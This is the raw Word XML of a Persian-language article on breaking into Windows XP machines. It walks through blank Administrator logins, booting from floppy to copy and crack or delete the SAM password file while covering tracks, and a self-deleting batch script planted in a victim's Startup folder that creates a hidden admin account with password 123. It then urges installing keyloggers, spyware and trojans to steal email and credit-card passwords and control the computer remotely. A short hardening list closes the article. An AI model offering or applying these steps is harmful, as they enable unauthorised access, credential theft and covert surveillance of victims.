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5066" w:type="pct"/>
        <w:jc w:val="right"/>
        <w:tblCellSpacing w:w="7" w:type="dxa"/>
        <w:tblInd w:w="-60" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="0F5C8E"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="0F5C8E"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="0F5C8E"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="0F5C8E"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="81A2C4"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9204"/>
      </w:tblGrid>
      <w:tr w:rsidR="00526157" w:rsidRPr="00526157" w:rsidTr="00206ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="7" w:type="dxa"/>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00526157" w:rsidRPr="00526157" w:rsidRDefault="00526157" w:rsidP="00526157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526157">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="17"/>
                <w:rtl/>
              </w:rPr>
              <w:t xml:space="preserve">روش نفوذ به ویندوز اکس پی </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00526157" w:rsidRPr="00526157" w:rsidRDefault="00526157" w:rsidP="00526157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براي اين کار چند روش وجود دارد که روش اول هميشه کار ساز نيست و فقط بر روي کامپيوتر هايي جواب ميدهد که از نظر پيکربندي امنيتي بسيار ضعيف هستند .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>روش اول :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 xml:space="preserve">در جايي که از شما </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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UserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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, Password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پرسيده مي شود کليد هاي </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Alt+Ctrl+Del</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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را دو مرتبه همزمان فشار دهيد . در قسمت </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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UserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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کلمه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Administrator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را وارد کرده و جاي کلمه عبور را خالي بگذاريد و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Enter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بزنيد تا وارد ويندوز شويد …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 xml:space="preserve">خوب اين روش ساده بود اما هميشه کارساز نيست اگر براي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Administrator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آن کلمه عبوري قرار داده شده باشد ؟!!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>به سراغ روش دوم ميرويم :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>روش دوم :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 xml:space="preserve">1- ابتدا يک فلاپي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Bootable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مي سازيم .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 xml:space="preserve">2- اغلب فايل سيستم ويندوز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XP,2000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از نوع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NTFS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است و در محيط شبيه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Dos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که با فلاپي راه اندازي ميشود شناخته نمي شود بنا براين ما براي اين کار نياز به برنامه هايي مثل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NTFS4DOS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داريم.(اين نوع برنامه ها امکان کار کردن با درايو هايي که فايل سيستم آنها </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Ntfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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را در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dos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به ما مي دهد.)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 xml:space="preserve">3- حالا که فلاپي آماده شد بايد با آن سيستم را راه اندازي کرد… اما اگر در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Setup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سيستم تنظيم شده باشد که با فلاپي راه اندازي نشود …؟!! آنگاه بايد به سراغ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Setup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رفت و در آن تنظيمات لازم را انجام دهيم اگر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Setup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با کلمه عبور محافظت شود آنگاه بايد به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Bios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نفوذ کنيم که در بخش نفوذ به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Bios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شرح داده شده است .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 xml:space="preserve">4- خوب پس از انجام مراحل فوق فلاپي را در فلاپي درايو قرار داده و سيستم را با آن راه اندازي مي کنيم . و بر نامه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NTFS4DOS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را اجرا مي کنيم تا به اطلاعات درايو هاي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NTFS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دسترسي داشته باشيم .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>5- درايوي که ويندوز در آن نصب است را پيدا مي کنيم و به مسير زير رفته :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>%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Windir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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%\System32\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>\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Example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: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c:\windows\system32\config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 xml:space="preserve">در اين پوشه فايلي به نام * </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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sam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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را در فلاپي کپي مي کنيم.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 xml:space="preserve">( نکته : در ويندوز 2000 با پاک کردن اين فايل ديگر کار تمام است و ميتوان با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Username: Administrator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و بدون پسورد وارد شويم اما ميتوان براي اين که رد پايي باقي نماند از فايل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Sam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يک کپي داشته باشيم تا بعد از انجام کارمان در ويندوز با برگرداندن اين فايل به جاي قبلي آن رد پاي خود را پاک کنيم و نام و پسورد کاربران به حالت قبل برگردد.)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 xml:space="preserve">از اين مرحله به بعد براي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Windows </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Xp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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بيشتر توصيه ميشود :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 xml:space="preserve">6- بعد از کپي فايل با برنامه هايي نظير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L0phtCrack ,John the Ripper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آن را کرک مي کنيم تا پسورد را به دست آورد .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>روش سوم :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>در اين روش چهار مرحله اول روش دوم را انجام ميدهيم.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 xml:space="preserve">1- دستورات زير را در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Notepad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مي نويسيم و در فايلي با نام و پسوند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test.bat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ذخيره ميکنيم :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>@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echo off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net user administrator 123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/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add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net </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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localgroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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administrator administrators /add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net user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administrator 123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del test.bat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>@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echo on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 xml:space="preserve">2- بعد فايل مورد نظر را در فلاپي کپي کرده و به سراغ کامپيوتر قرباني مي رويم و فايلي که در مرحله قبل ساخته ايم را در مسير زير کپي مي کنيم(به فرض که ويندوز در درايو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نصب باشد و کاربري با نام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MOJTABA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مدير سيستم باشد):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C:\Documents and Settings\MOJTABA\Start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Menu\Programs\Startup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 xml:space="preserve">3- خوب حالا فقط کافي است که منتظر بمانيد تا کاربر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MOJTABA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يک بار وارد شود ديگر تمام است و شما بعد از آن مي توانيد با نام کاربري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Administrator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و کلمه عبور 123 وارد سيستم شويد.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>توضيح دستورات مربوط به فايلي که ميسازيم :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>در خط اول اين دستور باعث مخفي شدن بقيه دستورات در حال اجرا از ديد کاربر مي شود.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 xml:space="preserve">در خط دوم ما يک کاربر بانام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Administrator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و کلمه عبور 123 مي سازيم .(اين عمل براي اين صورت مي گيرد که ممکن است نام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Administrator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را تغییر داده باشند).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>در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.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 xml:space="preserve">در خط چهارم احتمال می دهیم که نام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Administrator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را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.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>در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.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>در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.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 xml:space="preserve">نکته : توجه کنید که به جای کاربر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Administrator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و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار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lastRenderedPageBreak/>
              <w:t>دهید اما این کاربر کمتر باعث شک می شود .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>روش چهارم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 xml:space="preserve">استفاده از برنامه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Windows XP / 2000 / NT Key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است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.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>نتیجه :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>حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .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>اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و …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 xml:space="preserve">دوم این که توصیه می شود یک برنامه جاسوسی مثل </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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XpSpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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ها ویا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Key Logger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ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و … و وب سایت های که سر می زند و حتی کلماتی که چت می کند و … را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).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>سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین …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>چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .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>پنجم …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>توصیه های مهم :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>1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .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 xml:space="preserve">2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با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CD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و یا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Floppy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بوت نشود و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Bios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خود را با کلمه رمز محافظت نمایید.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 xml:space="preserve">3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور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X@#%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Übps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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خیلی بهتر از کلمه عبور </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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spssstudioworks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.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 xml:space="preserve">4-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LM Hash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را غیر فعال کنید . برای این منظور به کنترل پانل رفته و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Local Security Policy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را از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Administrative Tools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را اجرا کرده و به پوشه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Security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Option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از پوشه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Local Policies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رفته و در آنجا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Network Security : Do not Store LAN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Manager hash value on next password change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را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Enable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کنید سپس پسورد ادمین را عوض کنید.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 xml:space="preserve">5- نام کاربری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Administrator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و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Guest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را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .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 xml:space="preserve">6- اگر به کاربر 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Guest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t xml:space="preserve"> نیازی ندارید آن را غیر فعال کنید .</w:t>
            </w:r>
            <w:r w:rsidRPr="00526157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  <w:br/>
              <w:t xml:space="preserve">7- هر چند وقت یکبار پسورد خود را عوض کنید. 8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00372A30" w:rsidRDefault="00372A30"/>
    <w:sectPr w:rsidR="00372A30" w:rsidSect="009F079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157"/>
    <w:rsid w:val="00206ACA"/>
    <w:rsid w:val="00372A30"/>
    <w:rsid w:val="00510452"/>
    <w:rsid w:val="00526157"/>
    <w:rsid w:val="009F0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A3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lltext1">
    <w:name w:val="smalltext1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00526157"/>
    <w:rPr>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0052615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1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2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7293">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="15" w:color="E4E4E4"/>
            <w:left w:val="single" w:sz="6" w:space="15" w:color="E4E4E4"/>
            <w:bottom w:val="single" w:sz="6" w:space="15" w:color="E4E4E4"/>
            <w:right w:val="single" w:sz="6" w:space="15" w:color="E4E4E4"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1398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791</Words>
  <Characters>4511</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>37</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Grizli777</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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al_alizadeh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>al_alizadeh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-06-13T21:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-06-13T21:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>